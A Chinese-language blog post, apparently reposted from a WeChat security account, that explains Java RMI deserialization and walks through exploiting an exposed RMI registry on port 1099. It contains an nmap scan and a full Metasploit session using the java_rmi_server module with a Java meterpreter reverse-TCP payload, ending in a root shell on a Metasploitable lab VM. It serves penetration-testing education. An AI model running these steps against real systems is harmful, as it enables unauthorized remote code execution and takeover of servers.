Java rmi介绍
Java RMI 指的是远程方法调用 (Remote Method Invocation)。它是一种机制,能够让在某个 Java 虚拟机上的对象调用另一个 Java 虚拟机中的对象上的方法。
RMI是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程JAVA对象,可以从另一个JAVA虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。
对于任何一个以对象为参数的RMI接口,你都可以发一个自己构建的对象,迫使服务器端将这个对象按任何一个存在于class path中的可序列化类来反序列化。
RMI的传输100%基于反序列化。端口1099。
探测目标rmi
使用Nmap -p 1099 -sV IP地址探测目标的版本信息。
~ nmap -sV -p 1099 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-13 09:49 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
open Java-rmi Java RMI Registry
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Service Info: Host: localhost
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.86 seconds
rmi远程命令执行利用方法一:
➜ ~ msfconsole
[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]
2、使用exploit/multi/misc/java_rmi_server模块
msf5 > use exploit/multi/misc/java_rmi_server
msf5 exploit(multi/misc/java_rmi_server) > set rhosts 10.0.2.5
rhosts => 10.0.2.5
3、设置payload
msf5 exploit(multi/misc/java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(multi/misc/java_rmi_server) > set lhost 10.0.2.12
lhost => 10.0.2.12
4、检查配置
msf5 exploit(multi/misc/java_rmi_server) > show options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS 10.0.2.5 yes The target address range or CIDR identifier
RPORT 1099 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.12 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
5、进行漏洞攻击
msf5 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 10.0.2.12:4444
[*] 10.0.2.5:1099 - Using URL: http://0.0.0.0:8080/RTcs5fWbAmO91i
[*] 10.0.2.5:1099 - Local IP: http://192.168.1.34:8080/RTcs5fWbAmO91i
[*] 10.0.2.5:1099 - Server started.
[*] 10.0.2.5:1099 - Sending RMI Header...
[*] 10.0.2.5:1099 - Sending RMI Call...
[*] 10.0.2.5:1099 - Replied to request for payload JAR
[*] Sending stage (53845 bytes) to 10.0.2.5
[*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:35676) at 2019-07-13 09:54:48 -0400
id
[-] 10.0.2.5:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 10.0.2.5:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/misc/java_rmi_server) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter java/linux root @ metasploitable 10.0.2.12:4444 -> 10.0.2.5:35676 (10.0.2.5)
msf5 exploit(multi/misc/java_rmi_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
rmi远程命令执行利用方法二
原文始发于微信公众号(红云谈安全):Java RMI漏洞利用(1099/1090对外开放-rce)
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论